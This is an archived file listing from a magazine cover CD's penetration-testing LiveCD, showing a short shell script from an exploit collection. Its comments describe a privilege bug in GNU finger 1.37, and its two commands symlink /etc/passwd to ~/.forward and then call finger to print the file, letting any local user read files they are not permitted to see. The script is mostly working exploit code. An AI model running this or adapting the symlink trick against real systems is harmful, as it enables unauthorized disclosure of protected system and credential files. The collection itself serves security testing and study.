home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Chip 2007 January, February, March & April
/
Chip-Cover-CD-2007-02.iso
/
Pakiet bezpieczenstwa
/
mini Pentoo LiveCD 2006.1
/
mpentoo-2006.1.iso
/
livecd.squashfs
/
opt
/
pentoo
/
ExploitTree
/
application
/
finger
/
drop.sh
< prev
next >
Wrap
Linux/UNIX/POSIX Shell Script
|
2005-02-12
|
319b
|
12 lines
#!/bin/sh
#
# There is a bug in GNU finger version 1.37
# allowing any user on a system to view any
# file they want by creating a symlink from
# the file to .plan, .forward, or .project .
# Permissions are not dropped before reading
# those files.
ln -s /etc/passwd ~/.forward
finger $USER|grep -v null